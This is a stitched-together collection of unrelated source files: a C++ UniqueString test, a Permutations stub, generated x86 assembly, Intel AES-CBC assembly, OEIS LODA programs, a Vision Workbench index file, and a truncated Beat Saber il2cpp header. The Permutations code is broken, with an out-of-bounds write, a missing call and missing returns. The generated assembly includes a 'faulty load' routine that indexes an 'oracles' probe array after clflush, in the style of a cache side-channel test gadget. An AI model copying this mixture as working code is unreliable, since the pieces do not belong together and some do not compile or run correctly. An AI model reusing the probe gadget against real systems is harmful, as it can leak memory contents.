// double the word length to better match
// statistics of Chapel code
word += word;
if (dohisto) {
int len = word.size();
if (len > 40) len = 40;
querybysize[len]++;
nqueries++;
}
UniqueString::build(ctx, word);
}
}
}
file.close();
} else {
std::cerr << "could not open file " << inputFile << "\n";
exit(-1);
}
}
auto end = std::chrono::steady_clock::now();
std::chrono::duration<double> elapsed = end - start;
if (printTiming) {
std::cout << "unordered map elapsed time: " << elapsed.count() << " s\n";
if (dohisto) {
std::cout << "Queried " << nqueries << " strings\n";
int sum = 0;
for(int i = 0; i < 40; i++) {
std::cout << "length < " << i << " -- " << sum << "\n";
sum += querybysize[i];
std::cout << "length " << i << " -- " << querybysize[i] << "\n";
}
std::cout << "length >= 40 " << " -- " << querybysize[40] << "\n";
}
}
}
static void test0() {
Context context;
Context* ctx = &context;
// First, add some strings to the map and make sure we get uniqueness.
// needs to be long enough to require strdup etc.
#define TEST1STRING "this is a very very very long string"
std::string test1 = TEST1STRING;
std::string test1Copy = test1;
assert(test1.c_str() != test1Copy.c_str());
const char* t1 = ctx->uniqueCString(test1.c_str());
const char* t2 = ctx->uniqueCString(test1Copy.c_str());
const char* t3 = ctx->uniqueCString(TEST1STRING);
assert(t1 == t2);
assert(t2 == t3);
// this string is short enough to be inlined
std::string hello = "hello";
const char* h1 = ctx->uniqueCString("hello");
const char* h2 = ctx->uniqueCString(hello.c_str());
assert(h1 == h2);
// check that uniqueString(NULL) == uniqueString("")
assert(ctx->uniqueCString(nullptr) == ctx->uniqueCString(""));
// check that uniqueString(NULL) != nullptr
assert(ctx->uniqueCString(nullptr) != nullptr);
const char* x = ctx->uniqueCString("aVeryLongIdentifierName");
assert(x != h1 && x != nullptr);
}
static void test1() {
Context context;
Context* ctx = &context;
// First, add some strings to the map and make sure we get uniqueness.
// needs to be long enough to require strdup etc.
#define TEST1STRING "this is a very very very long string"
std::string test1 = TEST1STRING;
std::string test1Copy = test1;
assert(test1.c_str() != test1Copy.c_str());
UniqueString t1 = UniqueString::build(ctx, test1);
UniqueString t2 = UniqueString::build(ctx, test1Copy);
UniqueString t3 = UniqueString::build(ctx, TEST1STRING);
assert(t1.c_str() == t2.c_str());
assert(t2.c_str() == t3.c_str());
// this string is short enough to be inlined
std::string hello = "hello";
UniqueString h1 = UniqueString::build(ctx, "hello");
UniqueString h2 = UniqueString::build(ctx, hello);
assert(h1 == h2);
// check that uniqueString(NULL) == uniqueString("")
assert(UniqueString::build(ctx, NULL) == UniqueString::build(ctx, ""));
// check that default-constructed unique string matches one from ""
UniqueString empty;
assert(empty == UniqueString::build(ctx, ""));
// check ==
assert(t1 == t2);
assert(!(t1 != t2));
assert(h1 != t1);
assert(!(h1 == t1));
// test copy init
UniqueString t1Copy = t1;
UniqueString h1Copy = h1;
assert(t1Copy == t1);
assert(h1Copy == h1);
// test assignment
UniqueString t1assign;
UniqueString h1assign;
t1assign = t1;
h1assign = h1;
assert(t1assign == t1);
assert(h1assign == h1);
// test swap
t1Copy.swap(h1Copy);
assert(t1Copy == h1);
assert(h1Copy == t1);
// test hash
assert(t1.hash() != h1.hash());
}
int main(int argc, char** argv) {
const char* inputFile = "moby.txt";
std::string timingArg = "--timing";
bool printTiming = false;
for (int i = 1; i < argc; i++) {
if (argv[i] == timingArg)
printTiming = true;
else
inputFile = argv[i];
}
test0();
test1();
Context context;
Context* ctx = &context;
// Next, measure performance
testPerformance(ctx, inputFile, printTiming);
return 0;
}
|
#include <vector>
#include "permutations.hpp"
Permutations::Permutations(int n) : len(n) {
// create a n-dimensional vector : [1, 2, 3, ..., n]
std::vector<int> toPermute = {n};
for(int i=1; i<=len; i++) {
toPermute[i] = i;
};
// apply the permutation algorithm
// the complexity is O(n*n!) because of recursion.
}
Permutations::Permutations(std::vector<int> &toPermute) : len(toPermute.size) {
// apply the permutation algorithm.
}
int Permutations::length() {return len;};
std::vector<std::vector<int>> Permutations::elements() {
// return the list of all the permutations.
} |
.global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r9
push %rax
push %rbp
push %rcx
push %rdi
push %rdx
push %rsi
lea addresses_WT_ht+0x3f4f, %rax
nop
nop
nop
sub %r12, %r12
movups (%rax), %xmm1
vpextrq $1, %xmm1, %r9
nop
dec %rbp
lea addresses_WC_ht+0xcacf, %rsi
nop
nop
nop
xor $318, %rdx
mov (%rsi), %rcx
nop
add $47318, %r12
lea addresses_WT_ht+0x1d6cf, %rsi
lea addresses_A_ht+0x1404f, %rdi
nop
add %r9, %r9
mov $90, %rcx
rep movsq
nop
nop
and $52466, %rsi
lea addresses_D_ht+0x15e4f, %r12
nop
nop
nop
nop
nop
and $1537, %r9
movb (%r12), %cl
nop
add %r9, %r9
lea addresses_A_ht+0x1e79f, %r12
and %rdi, %rdi
movups (%r12), %xmm6
vpextrq $0, %xmm6, %rcx
nop
nop
nop
nop
nop
xor $43272, %r12
lea addresses_D_ht+0x44a3, %rsi
lea addresses_WC_ht+0x153cf, %rdi
nop
nop
nop
and $3885, %rdx
mov $19, %rcx
rep movsl
dec %r9
lea addresses_UC_ht+0x12acf, %rsi
lea addresses_A_ht+0xfb4f, %rdi
nop
xor %rdx, %rdx
mov $35, %rcx
rep movsb
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_D_ht+0x1df4f, %r12
nop
nop
nop
add %rdx, %rdx
mov $0x6162636465666768, %r9
movq %r9, (%r12)
nop
nop
nop
nop
xor %rsi, %rsi
lea addresses_WC_ht+0x73cf, %rdi
inc %rcx
mov $0x6162636465666768, %rax
movq %rax, %xmm0
movups %xmm0, (%rdi)
nop
nop
nop
nop
sub $9618, %r12
lea addresses_D_ht+0x634f, %rsi
lea addresses_D_ht+0x104cf, %rdi
clflush (%rsi)
nop
and %r12, %r12
mov $9, %rcx
rep movsl
nop
nop
nop
nop
nop
xor %rcx, %rcx
lea addresses_WT_ht+0x17b4f, %r9
clflush (%r9)
add $65193, %rax
movb (%r9), %dl
nop
nop
nop
nop
and %r12, %r12
lea addresses_UC_ht+0x1af4f, %rax
nop
nop
nop
xor %rdi, %rdi
movw $0x6162, (%rax)
dec %rdi
pop %rsi
pop %rdx
pop %rdi
pop %rcx
pop %rbp
pop %rax
pop %r9
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r13
push %r9
push %rbp
push %rdi
push %rdx
// Faulty Load
lea addresses_RW+0x1634f, %rdi
nop
nop
dec %r9
mov (%rdi), %r13d
lea oracles, %r9
and $0xff, %r13
shlq $12, %r13
mov (%r9,%r13,1), %r13
pop %rdx
pop %rdi
pop %rbp
pop %r9
pop %r13
ret
/*
<gen_faulty_load>
[REF]
{'src': {'NT': False, 'AVXalign': False, 'size': 32, 'congruent': 0, 'same': False, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
[Faulty Load]
{'src': {'NT': False, 'AVXalign': False, 'size': 4, 'congruent': 0, 'same': True, 'type': 'addresses_RW'}, 'OP': 'LOAD'}
<gen_prepare_buffer>
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 10, 'same': False, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 3, 'same': False, 'type': 'addresses_WT_ht'}, 'dst': {'congruent': 8, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 8, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'LOAD'}
{'src': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 4, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'LOAD'}
{'src': {'congruent': 2, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'REPM'}
{'src': {'congruent': 7, 'same': False, 'type': 'addresses_UC_ht'}, 'dst': {'congruent': 11, 'same': False, 'type': 'addresses_A_ht'}, 'OP': 'REPM'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 8, 'congruent': 10, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'STOR'}
{'dst': {'NT': False, 'AVXalign': False, 'size': 16, 'congruent': 7, 'same': False, 'type': 'addresses_WC_ht'}, 'OP': 'STOR'}
{'src': {'congruent': 11, 'same': False, 'type': 'addresses_D_ht'}, 'dst': {'congruent': 7, 'same': False, 'type': 'addresses_D_ht'}, 'OP': 'REPM'}
{'src': {'NT': False, 'AVXalign': False, 'size': 1, 'congruent': 9, 'same': True, 'type': 'addresses_WT_ht'}, 'OP': 'LOAD'}
{'dst': {'NT': True, 'AVXalign': False, 'size': 2, 'congruent': 9, 'same': False, 'type': 'addresses_UC_ht'}, 'OP': 'STOR'}
{'32': 21829}
32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32
*/
|
;;
;; Copyright (c) 2019, Intel Corporation
;;
;; Redistribution and use in source and binary forms, with or without
;; modification, are permitted provided that the following conditions are met:
;;
;; * Redistributions of source code must retain the above copyright notice,
;; this list of conditions and the following disclaimer.
;; * Redistributions in binary form must reproduce the above copyright
;; notice, this list of conditions and the following disclaimer in the
;; documentation and/or other materials provided with the distribution.
;; * Neither the name of Intel Corporation nor the names of its contributors
;; may be used to endorse or promote products derived from this software
;; without specific prior written permission.
;;
;; THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
;; AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
;; IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
;; DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE
;; FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
;; DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
;; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
;; CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
;; OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
;; OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
;;
%include "include/os.asm"
%include "job_aes_hmac.asm"
%include "mb_mgr_datastruct.asm"
%include "include/reg_sizes.asm"
%include "include/const.inc"
%ifndef AES_CBC_ENC_X16
%define AES_CBC_ENC_X16 aes_cbc_enc_128_vaes_avx512
%define NUM_KEYS 11
%define SUBMIT_JOB_AES_ENC submit_job_aes128_enc_vaes_avx512
%endif
; void AES_CBC_ENC_X16(AES_ARGS_x16 *args, UINT64 len_in_bytes);
extern AES_CBC_ENC_X16
section .text
%ifdef LINUX
%define arg1 rdi
%define arg2 rsi
%else
%define arg1 rcx
%define arg2 rdx
%endif
%define state arg1
%define job arg2
%define len2 arg2
%define job_rax rax
%if 1
; idx needs to be in rbp
%define len rbp
%define idx rbp
%define tmp r10
%define tmp2 r11
%define tmp3 r12
%define lane r8
%define iv r9
%define unused_lanes rbx
%endif
; STACK_SPACE needs to be an odd multiple of 8
; This routine and its callee clobbers all GPRs
struc STACK
_gpr_save: resq 8
_rsp_save: resq 1
endstruc
%macro INSERT_KEYS 6
%define %%KP %1 ; [in] GP reg with pointer to expanded keys
%define %%LANE %2 ; [in] GP reg with lane number
%define %%NKEYS %3 ; [in] number of round keys (numerical value)
%define %%COL %4 ; [clobbered] GP reg
%define %%ZTMP %5 ; [clobbered] ZMM reg
%define %%IA0 %6 ; [clobbered] GP reg
%assign ROW (16*16)
mov %%COL, %%LANE
shl %%COL, 4
lea %%IA0, [state + _aes_args_key_tab]
add %%COL, %%IA0
vmovdqu64 %%ZTMP, [%%KP]
vextracti64x2 [%%COL + ROW*0], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*1], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*2], %%ZTMP, 2
vextracti64x2 [%%COL + ROW*3], %%ZTMP, 3
vmovdqu64 %%ZTMP, [%%KP + 64]
vextracti64x2 [%%COL + ROW*4], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*5], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*6], %%ZTMP, 2
vextracti64x2 [%%COL + ROW*7], %%ZTMP, 3
%if %%NKEYS > 11 ; 192 or 256 - copy 4 more keys
vmovdqu64 %%ZTMP, [%%KP + 128]
vextracti64x2 [%%COL + ROW*11], %%ZTMP, 3
%else ; 128 - copy 3 more keys
mov %%IA0, 0x3f
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 128]
%endif
vextracti64x2 [%%COL + ROW*8], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*9], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*10], %%ZTMP, 2
%if %%NKEYS == 15 ; 256 - 3 more keys
mov %%IA0, 0x3f
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 192]
vextracti64x2 [%%COL + ROW*12], %%ZTMP, 0
vextracti64x2 [%%COL + ROW*13], %%ZTMP, 1
vextracti64x2 [%%COL + ROW*14], %%ZTMP, 2
%elif %%NKEYS == 13 ; 192 - 1 more key
mov %%IA0, 0x3
kmovq k1, %%IA0
vmovdqu64 %%ZTMP{k1}{z}, [%%KP + 192]
vextracti64x2 [%%COL + ROW*12], %%ZTMP, 0
%endif
%endmacro
; JOB* SUBMIT_JOB_AES_ENC(MB_MGR_AES_OOO *state, JOB_AES_HMAC *job)
; arg 1 : state
; arg 2 : job
MKGLOBAL(SUBMIT_JOB_AES_ENC,function,internal)
SUBMIT_JOB_AES_ENC:
mov rax, rsp
sub rsp, STACK_size
and rsp, -16
mov [rsp + _gpr_save + 8*0], rbx
mov [rsp + _gpr_save + 8*1], rbp
mov [rsp + _gpr_save + 8*2], r12
mov [rsp + _gpr_save + 8*3], r13
mov [rsp + _gpr_save + 8*4], r14
mov [rsp + _gpr_save + 8*5], r15
%ifndef LINUX
mov [rsp + _gpr_save + 8*6], rsi
mov [rsp + _gpr_save + 8*7], rdi
%endif
mov [rsp + _rsp_save], rax ; original SP
mov unused_lanes, [state + _aes_unused_lanes]
mov lane, unused_lanes
and lane, 0xF
shr unused_lanes, 4
mov len, [job + _msg_len_to_cipher_in_bytes]
and len, -16 ; DOCSIS may pass size unaligned to block size
mov iv, [job + _iv]
mov [state + _aes_unused_lanes], unused_lanes
add qword [state + _aes_lanes_in_use], 1
mov [state + _aes_job_in_lane + lane*8], job
;; Update lane len
vmovdqa64 ymm0, [state + _aes_lens]
mov tmp2, rcx ; save rcx
mov rcx, lane
mov tmp, 1
shl tmp, cl
mov rcx, tmp2 ; restore rcx
kmovq k1, tmp
vpbroadcastw ymm1, WORD(len)
vmovdqu16 ymm0{k1}, ymm1
vmovdqa64 [state + _aes_lens], ymm0
;; Find min length for lanes 0-7
vphminposuw xmm2, xmm0
;; Update input pointer
mov tmp, [job + _src]
add tmp, [job + _cipher_start_src_offset_in_bytes]
vmovdqu xmm1, [iv]
mov [state + _aes_args_in + lane*8], tmp
;; Insert expanded keys
mov tmp, [job + _aes_enc_key_expanded]
INSERT_KEYS tmp, lane, NUM_KEYS, tmp2, zmm4, tmp3
;; Update output pointer
mov tmp, [job + _dst]
mov [state + _aes_args_out + lane*8], tmp
shl lane, 4 ; multiply by 16
vmovdqa [state + _aes_args_IV + lane], xmm1
cmp qword [state + _aes_lanes_in_use], 16
jne return_null
; Find min length for lanes 8-15
vpextrw DWORD(len2), xmm2, 0 ; min value
vpextrw DWORD(idx), xmm2, 1 ; min index
vextracti128 xmm1, ymm0, 1
vphminposuw xmm2, xmm1
vpextrw DWORD(tmp), xmm2, 0 ; min value
cmp DWORD(len2), DWORD(tmp)
jle use_min
vpextrw DWORD(idx), xmm2, 1 ; min index
add DWORD(idx), 8 ; but index +8
mov len2, tmp ; min len
use_min:
cmp len2, 0
je len_is_0
vpbroadcastw ymm3, WORD(len2)
vpsubw ymm0, ymm0, ymm3
vmovdqa [state + _aes_lens], ymm0
; "state" and "args" are the same address, arg1
; len is arg2
call AES_CBC_ENC_X16
; state and idx are intact
len_is_0:
; process completed job "idx"
mov job_rax, [state + _aes_job_in_lane + idx*8]
mov unused_lanes, [state + _aes_unused_lanes]
mov qword [state + _aes_job_in_lane + idx*8], 0
or dword [job_rax + _status], STS_COMPLETED_AES
shl unused_lanes, 4
or unused_lanes, idx
mov [state + _aes_unused_lanes], unused_lanes
sub qword [state + _aes_lanes_in_use], 1
%ifdef SAFE_DATA
;; Clear IV
vpxorq xmm0, xmm0
shl idx, 4 ; multiply by 16
vmovdqa [state + _aes_args_IV + idx], xmm0
;; Clear expanded keys
%assign round 0
%rep NUM_KEYS
vmovdqa [state + _aesarg_key_tab + round * (16*16) + idx], xmm0
%assign round (round + 1)
%endrep
%endif
return:
mov rbx, [rsp + _gpr_save + 8*0]
mov rbp, [rsp + _gpr_save + 8*1]
mov r12, [rsp + _gpr_save + 8*2]
mov r13, [rsp + _gpr_save + 8*3]
mov r14, [rsp + _gpr_save + 8*4]
mov r15, [rsp + _gpr_save + 8*5]
%ifndef LINUX
mov rsi, [rsp + _gpr_save + 8*6]
mov rdi, [rsp + _gpr_save + 8*7]
%endif
mov rsp, [rsp + _rsp_save] ; original SP
ret
return_null:
xor job_rax, job_rax
jmp return
%ifdef LINUX
section .note.GNU-stack noalloc noexec nowrite progbits
%endif
|
; A061313: Minimal number of steps to get from 1 to n by (a) subtracting 1 or (b) multiplying by 2.
; 0,1,3,2,5,4,4,3,7,6,6,5,6,5,5,4,9,8,8,7,8,7,7,6,8,7,7,6,7,6,6,5,11,10,10,9,10,9,9,8,10,9,9,8,9,8,8,7,10,9,9,8,9,8,8,7,9,8,8,7,8,7,7,6,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,12,11,11,10,11,10,10,9,11,10,10,9,10,9,9,8,12,11,11,10,11,10,10,9,11,10,10,9,10,9,9,8,11,10,10,9,10,9,9,8,10,9,9,8,9,8,8,7,15,14,14,13,14,13,13,12,14,13,13,12,13,12,12,11,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,12,11,11,10,11,10,10,9,11,10
mov $2,$0
lpb $0
gcd $0,2
add $1,$0
div $2,2
mov $0,$2
lpe
|
// __BEGIN_LICENSE__
// Copyright (C) 2006-2011 United States Government as represented by
// the Administrator of the National Aeronautics and Space Administration.
// All Rights Reserved.
// __END_LICENSE__
#include <vw/Plate/detail/Index.h>
#include <vw/Plate/detail/RemoteIndex.h>
#include <vw/Plate/detail/LocalIndex.h>
#include <vw/Plate/HTTPUtils.h>
using namespace vw::platefile;
using namespace vw::platefile::detail;
boost::shared_ptr<Index> Index::construct_create(const Url& url, const IndexHeader& new_index_info) {
if (url.scheme() == "file")
return boost::shared_ptr<Index>(new LocalIndex(url.path(), new_index_info));
else
return boost::shared_ptr<Index>(new RemoteIndex(url, new_index_info));
}
boost::shared_ptr<Index> Index::construct_open(const Url& url) {
if (url.scheme() == "file")
return boost::shared_ptr<Index>(new LocalIndex(url.path()));
else
return boost::shared_ptr<Index>(new RemoteIndex(url));
}
|
; A210062: Number of digits in 7^n.
; Submitted by Christian Krause
; 1,1,2,3,4,5,6,6,7,8,9,10,11,11,12,13,14,15,16,17,17,18,19,20,21,22,22,23,24,25,26,27,28,28,29,30,31,32,33,33,34,35,36,37,38,39,39,40,41,42,43,44,44,45,46,47,48,49,50,50,51,52,53,54,55,55,56,57,58,59,60,61,61,62,63,64,65,66,66,67,68,69,70,71,71,72,73,74,75,76,77,77,78,79,80,81,82,82,83,84
mov $2,$0
mov $0,7
pow $0,$2
lpb $0
div $0,10
add $1,64
lpe
mov $0,$1
div $0,64
|
// Autogenerated from CppHeaderCreator
// Created by Sc2ad
// =========================================================================
#pragma once
// Begin includes
#include "extern/beatsaber-hook/shared/utils/typedefs.h"
#include "extern/beatsaber-hook/shared/utils/byref.hpp"
// Including type: HMUI.ContainerViewController
#include "HMUI/ContainerViewController.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-properties.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-fields.hpp"
#include "extern/beatsaber-hook/shared/utils/utils.h"
// Completed includes
// Begin forward declares
// Forward declaring namespace: HMUI
namespace HMUI {
// Skipping declaration: ViewController because it is already included!
}
// Forward declaring namespace: System
namespace System {
// Forward declaring type: Action
class Action;
}
// Forward declaring namespace: System::Collections::Generic
namespace System::Collections::Generic {
// Forward declaring type: List`1<T>
template<typename T>
class List_1;
}
// Completed forward declares
// Type namespace: HMUI
namespace HMUI {
// Forward declaring type: StackedController
class StackedController;
}
#include "extern/beatsaber-hook/shared/utils/il2cpp-type-check.hpp"
NEED_NO_BOX(HMUI::StackedController);
DEFINE_IL2CPP_ARG_TYPE(HMUI::StackedController*, "HMUI", "StackedController");
// Type namespace: HMUI
namespace HMUI {
// Size: 0x80
#pragma pack(push, 1)
// Autogenerated type: HMUI.StackedController
// [TokenAttribute] Offset: FFFFFFFF
class StackedController : public HMUI::ContainerViewController {
public:
// Nested type: HMUI::StackedController::$$c
class $$c;
// Nested type: HMUI::StackedController::$$c__DisplayClass5_0
class $$c__DisplayClass5_0;
// public HMUI.ViewController get_topStackedViewController()
// Offset: 0x1400D4C
HMUI::ViewController* get_topStackedViewController();
// public System.Void PushViewController(HMUI.ViewController viewController, System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1400F80
void PushViewController(HMUI::ViewController* viewController, System::Action* finishedCallback, bool immediately);
// public System.Void PopViewController(System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1401054
void PopViewController(System::Action* finishedCallback, bool immediately);
// public System.Void PopViewControllers(System.Int32 numberOfViewControllersToPop, System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1401068
void PopViewControllers(int numberOfViewControllersToPop, System::Action* finishedCallback, bool immediately);
// static private System.Void SetupViewControllerRect(HMUI.ViewController viewController, System.Int32 index)
// Offset: 0x1400EFC
static void SetupViewControllerRect(HMUI::ViewController* viewController, int index);
// public System.Void .ctor()
// Offset: 0x1401200
// Implemented from: HMUI.ContainerViewController
// Base method: System.Void ContainerViewController::.ctor()
// Base method: System.Void ViewController::.ctor()
// Base method: System.Void MonoBehaviour::.ctor()
// Base method: System.Void Behaviour::.ctor()
// Base method: System.Void Component::.ctor()
// Base method: System.Void Object::.ctor()
// Base method: System.Void Object::.ctor()
template<::il2cpp_utils::CreationType creationType = ::il2cpp_utils::CreationType::Temporary>
static StackedController* New_ctor() {
static auto ___internal__logger = ::Logger::get().WithContext("HMUI::StackedController::.ctor");
return THROW_UNLESS((::il2cpp_utils::New<StackedController*, creationType>()));
}
// protected override System.Void LayoutViewControllers(System.Collections.Generic.List`1<HMUI.ViewController> viewControllers)
// Offset: 0x1400DB8
// Implemented from: HMUI.ContainerViewController
// Base method: System.Void ContainerViewController::LayoutViewControllers(System.Collections.Generic.List`1<HMUI.ViewController> viewControllers)
void LayoutViewControllers(System::Collections::Generic::List_1<HMUI::ViewController*>* viewControllers);
}; // HMUI.StackedController
#pragma pack(pop)
}
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
// Writing MetadataGetter for method: HMUI::StackedController::get_topStackedViewController
// Il2CppName: get_topStackedViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<HMUI::ViewController* (HMUI::StackedController::*)()>(&HMUI::StackedController::get_topStackedViewController)> {
static const MethodInfo* get() {
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "get_topStackedViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PushViewController
// Il2CppName: PushViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(HMUI::ViewController*, System::Action*, bool)>(&HMUI::StackedController::PushViewController)> {
static const MethodInfo* get() {
static auto* viewController = &::il2cpp_utils::GetClassFromName("HMUI", "ViewController")->byval_arg;
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PushViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewController, finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PopViewController
// Il2CppName: PopViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(System::Action*, bool)>(&HMUI::StackedController::PopViewController)> {
static const MethodInfo* get() {
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PopViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PopViewControllers
// Il2CppName: PopViewControllers
template<>
